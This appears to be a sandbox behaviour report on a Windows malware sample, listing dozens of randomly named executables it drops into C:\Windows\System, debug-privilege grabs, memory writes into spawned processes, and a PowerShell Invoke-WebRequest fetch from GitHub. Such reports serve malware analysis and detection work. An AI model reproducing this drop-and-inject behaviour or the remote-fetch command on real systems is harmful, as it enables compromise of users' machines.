File created C:\Windows\System\PtpMQnp.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\TwHUGdT.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\JySsreT.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\UDwrsGd.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\cxlSnnG.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\LxvrQLb.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\pmyJYdn.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\cLokJhK.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\IyVcBFL.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\OAEhXLv.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\zRSXfoL.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\WuvfMSs.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\eSJRtOv.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\uzSgnpX.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\TofyMSK.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\kQomjPW.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\WzSFhpP.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\KetzrMx.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\HmXKAyw.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\MkeWUaW.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\BJCCGTq.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\QMLBbUK.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\NdphFcf.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\fkugriU.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\TZziTgO.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\EHSYwaK.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\IAKJuRH.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\YaZsnXH.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\mekkrxg.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\RNufWFO.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\jDhtwBM.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\oYxXvwl.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\eZSVNAW.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\LSyEGhu.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\msOzWpi.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\vYHIDtT.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\HMshZBM.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\XccdBRm.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\iFzAXHJ.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\aDyzAjB.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\oTmJGyl.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\eqPusgU.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\dtvTVsL.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\kkyiXMy.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\FFcYjmk.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\buUMpUB.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\OnNrfyl.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\MLDGpEO.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\vQyNYQt.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\YdKTllQ.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\XyHgQSH.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\OhAjUOO.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\VsDqpmg.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\vrCiNMI.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\fvVTXnj.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\OooZdIe.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\jDxRsUH.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4880 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4880 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4880 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\NdphFcf.exe
PID 4880 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\NdphFcf.exe
PID 4880 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\xgAvRQE.exe
PID 4880 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\xgAvRQE.exe
PID 4880 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\WdQXNNQ.exe
PID 4880 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\WdQXNNQ.exe
PID 4880 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\uwkwFEY.exe
PID 4880 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\uwkwFEY.exe
PID 4880 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\SwXdctl.exe
PID 4880 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\SwXdctl.exe
PID 4880 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\aKqSdGD.exe
PID 4880 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\aKqSdGD.exe
PID 4880 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\DNSvnae.exe
PID 4880 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\DNSvnae.exe
PID 4880 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\BDBNIWF.exe
PID 4880 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\BDBNIWF.exe
PID 4880 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\kFfuBHD.exe
PID 4880 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\kFfuBHD.exe
PID 4880 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\LtzHhPv.exe
PID 4880 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\LtzHhPv.exe
PID 4880 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\tHrKygf.exe
PID 4880 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\tHrKygf.exe
PID 4880 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\EHSYwaK.exe
PID 4880 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\EHSYwaK.exe
PID 4880 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\xZEjcYb.exe
PID 4880 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\xZEjcYb.exe
PID 4880 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\wZsZhpK.exe
PID 4880 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\wZsZhpK.exe
PID 4880 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\zKMqbwL.exe
PID 4880 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\zKMqbwL.exe
PID 4880 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\qyjwxLN.exe
PID 4880 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\qyjwxLN.exe
PID 4880 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\bVWjLTA.exe
PID 4880 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\bVWjLTA.exe
PID 4880 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\NJQGeKj.exe
PID 4880 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\NJQGeKj.exe
PID 4880 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\eyLWvnO.exe
PID 4880 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\eyLWvnO.exe
PID 4880 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\BOkFzyq.exe
PID 4880 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\BOkFzyq.exe
PID 4880 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dluysCY.exe
PID 4880 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dluysCY.exe
PID 4880 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\TIcCpKc.exe
PID 4880 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\TIcCpKc.exe
PID 4880 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\VbdFhHk.exe
PID 4880 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\VbdFhHk.exe
PID 4880 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\pEfCnzK.exe
PID 4880 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\pEfCnzK.exe
PID 4880 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\bsLmRio.exe
PID 4880 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\bsLmRio.exe
PID 4880 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dGEVtPI.exe
PID 4880 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dGEVtPI.exe
PID 4880 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\NfVsmYE.exe
PID 4880 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\NfVsmYE.exe
PID 4880 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\nwqCazX.exe
PID 4880 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\nwqCazX.exe
PID 4880 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\BkimbLS.exe
PID 4880 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\BkimbLS.exe
PID 4880 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\xwSXYDt.exe
PID 4880 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\xwSXYDt.exe
PID 4880 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\ZIvfKVq.exe
PID 4880 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\ZIvfKVq.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\NdphFcf.exe

C:\Windows\System\NdphFcf.exe

C:\Windows\System\xgAvRQE.exe

C:\Windows\System\xgAvRQE.exe

C:\Windows\System\WdQXNNQ.exe

C:\Windows\System\WdQXNNQ.exe

C:\Windows\System\uwkwFEY.exe

C:\Windows\System\uwkwFEY.exe

C:\Windows\System\SwXdctl.exe

C:\Windows\System\SwXdctl.exe

C:\Windows\System\aKqSdGD.exe

C:\Windows\System\aKqSdGD.exe

C:\Windows\System\DNSvnae.exe

C:\Windows\System\DNSvnae.exe

C:\Windows\System\BDBNIWF.exe

C:\Windows\System\BDBNIWF.exe

C:\Windows\System\kFfuBHD.exe

C:\Windows\System\kFfuBHD.exe

C:\Windows\System\LtzHhPv.exe

C:\Windows\System\LtzHhPv.exe

C:\Windows\System\tHrKygf.exe

C:\Windows\System\tHrKygf.exe

C:\Windows\System\EHSYwaK.exe

C:\Windows\System\EHSYwaK.exe

C:\Windows\System\xZEjcYb.exe

C:\Windows\System\xZEjcYb.exe

C:\Windows\System\wZsZhpK.exe

C:\Windows\System\wZsZhpK.exe

C:\Windows\System\zKMqbwL.exe

C:\Windows\System\zKMqbwL.exe

C:\Windows\System\qyjwxLN.exe

C:\Windows\System\qyjwxLN.exe

C:\Windows\System\bVWjLTA.exe

C:\Windows\System\bVWjLTA.exe

C:\Windows\System\NJQGeKj.exe

C:\Windows\System\NJQGeKj.exe

C:\Windows\System\eyLWvnO.exe

C:\Windows\System\eyLWvnO.exe

C:\Windows\System\BOkFzyq.exe

C:\Windows\System\BOkFzyq.exe

C:\Windows\System\dluysCY.exe

C:\Windows\System\dluysCY.exe

C:\Windows\System\TIcCpKc.exe

C:\Windows\System\TIcCpKc.exe

C:\Windows\System\VbdFhHk.exe

C:\Windows\System\VbdFhHk.exe

C:\Windows\System\pEfCnzK.exe

C:\Windows\System\pEfCnzK.exe

C:\Windows\System\bsLmRio.exe

C:\Windows\System\bsLmRio.exe

C:\Windows\System\dGEVtPI.exe

C:\Windows\System\dGEVtPI.exe

C:\Windows\System\NfVsmYE.exe

C:\Windows\System\NfVsmYE.exe

C:\Windows\System\nwqCazX.exe

C:\Windows\System\nwqCazX.exe

C:\Windows\System\BkimbLS.exe

C:\Windows\System\BkimbLS.exe

C:\Windows\System\xwSXYDt.exe

C:\Windows\System\xwSXYDt.exe

C:\Windows\System\ZIvfKVq.exe

C:\Windows\System\ZIvfKVq.exe

C:\Windows\System\qeXwFzl.exe

C:\Windows\System\qeXwFzl.exe

C:\Windows\System\ckAoCpL.exe

C:\Windows\System\ckAoCpL.exe

C:\Windows\System\TRWESFt.exe

C:\Windows\System\TRWESFt.exe

C:\Windows\System\CFrfDZH.exe

C:\Windows\System\CFrfDZH.exe

C:\Windows\System\GZIgJrq.exe

C:\Windows\System\GZIgJrq.exe

C:\Windows\System\phHoCBY.exe

C:\Windows\System\phHoCBY.exe

C:\Windows\System\mZDbyLF.exe

C:\Windows\System\mZDbyLF.exe

C:\Windows\System\QwiKWSz.exe

C:\Windows\System\QwiKWSz.exe

C:\Windows\System\XgAhpJn.exe

C:\Windows\System\XgAhpJn.exe

C:\Windows\System\qqoKFVO.exe

C:\Windows\System\qqoKFVO.exe

C:\Windows\System\OjRxwcf.exe

C:\Windows\System\OjRxwcf.exe

C:\Windows\System\KLmAQvq.exe

C:\Windows\System\KLmAQvq.exe

C:\Windows\System\YaRMNtA.exe

C:\Windows\System\YaRMNtA.exe

C:\Windows\System\dfzFIQM.exe

C:\Windows\System\dfzFIQM.exe

C:\Windows\System\WzOdFoc.exe

C:\Windows\System\WzOdFoc.exe

C:\Windows\System\JqAsXei.exe

C:\Windows\System\JqAsXei.exe

C:\Windows\System\eYrQPXU.exe

C:\Windows\System\eYrQPXU.exe

C:\Windows\System\dNpVUin.exe

C:\Windows\System\dNpVUin.exe

C:\Windows\System\eHmkYhX.exe

C:\Windows\System\eHmkYhX.exe

C:\Windows\System\mkTTbFV.exe

C:\Windows\System\mkTTbFV.exe

C:\Windows\System\oJdiTsx.exe

C:\Windows\System\oJdiTsx.exe

C:\Windows\System\QZpkuye.exe

C:\Windows\System\QZpkuye.exe

C:\Windows\System\ahhyKEi.exe

C:\Windows\System\ahhyKEi.exe

C:\Windows\System\pXWOMPC.exe

C:\Windows\System\pXWOMPC.exe

C:\Windows\System\GvWHJUy.exe

C:\Windows\System\GvWHJUy.exe

C:\Windows\System\pvKirCx.exe

C:\Windows\System\pvKirCx.exe

C:\Windows\System\ndQFuTh.exe

C:\Windows\System\ndQFuTh.exe

C:\Windows\System\oATAIWU.exe

C:\Windows\System\oATAIWU.exe

C:\Windows\System\QBTBxsE.exe

C:\Windows\System\QBTBxsE.exe

C:\Windows\System\JLVZwNK.exe

C:\Windows\System\JLVZwNK.exe

C:\Windows\System\GmhYvxT.exe

C:\Windows\System\GmhYvxT.exe

C:\Windows\System\YAbdSwZ.exe

C:\Windows\System\YAbdSwZ.exe

C:\Windows\System\JQvzgXC.exe

C:\Windows\System\JQvzgXC.exe

C:\Windows\System\Vzdyzfm.exe

C:\Windows\System\Vzdyzfm.exe

C:\Windows\System\cqkUinN.exe

C:\Windows\System\cqkUinN.exe

C:\Windows\System\SATtcls.exe

C:\Windows\System\SATtcls.exe

C:\Windows\System\SCCotuo.exe

C:\Windows\System\SCCotuo.exe

C:\Windows\System\sxOlNVt.exe

C:\Windows\System\sxOlNVt.exe

C:\Windows\System\wPpjXcl.exe

C:\Windows\System\wPpjXcl.exe

C:\Windows\System\WSSXZBM.exe

C:\Windows\System\WSSXZBM.exe

C:\Windows\System\TsZvvem.exe

C:\Windows\System\TsZvvem.exe

C:\Windows\System\KQzfuMu.exe

C:\Windows\System\KQzfuMu.exe

C:\Windows\System\DtAXuUv.exe

C:\Windows\System\DtAXuUv.exe

C:\Windows\System\mhhosuH.exe

C:\Windows\System\mhhosuH.exe

C:\Windows\System\FjtGxHi.exe

C:\Windows\System\FjtGxHi.exe

C:\Windows\System\QJunLOx.exe

C:\Windows\System\QJunLOx.exe

C:\Windows\System\nenBlXn.exe

C:\Windows\System\nenBlXn.exe

C:\Windows\System\RrXMZHA.exe

C:\Windows\System\RrXMZHA.exe

C:\Windows\System\zcUgRpb.exe

C:\Windows\System\zcUgRpb.exe

C:\Windows\System\uTsQqfA.exe

C:\Windows\System\uTsQqfA.exe

C:\Windows\System\NUxHTDT.exe

C:\Windows\System\NUxHTDT.exe

C:\Windows\System\ZohycyB.exe

C:\Windows\System\ZohycyB.exe

C:\Windows\System\uGPjdHC.exe

C:\Windows\System\uGPjdHC.exe

C:\Windows\System\UqJpcfr.exe

C:\Windows\System\UqJpcfr.exe

C:\Windows\System\sSKuxEb.exe

C:\Windows\System\sSKuxEb.exe

C:\Windows\System\oGpRtUQ.exe

C:\Windows\System\oGpRtUQ.exe

C:\Windows\System\ryhjFVq.exe

C:\Windows\System\ryhjFVq.exe

C:\Windows\System\EczIcpa.exe

C:\Windows\System\EczIcpa.exe

C:\Windows\System\wsjuGKs.exe

C:\Windows\System\wsjuGKs.exe

C:\Windows\System\IXGcZmp.exe

C:\Windows\System\IXGcZmp.exe

C:\Windows\System\nCsxlyy.exe

C:\Windows\System\nCsxlyy.exe

C:\Windows\System\WMmelmT.exe

C:\Windows\System\WMmelmT.exe

C:\Windows\System\LnVfGfk.exe

C:\Windows\System\LnVfGfk.exe

C:\Windows\System\txdBCgI.exe

C:\Windows\System\txdBCgI.exe

C:\Windows\System\zcVjsCF.exe

C:\Windows\System\zcVjsCF.exe

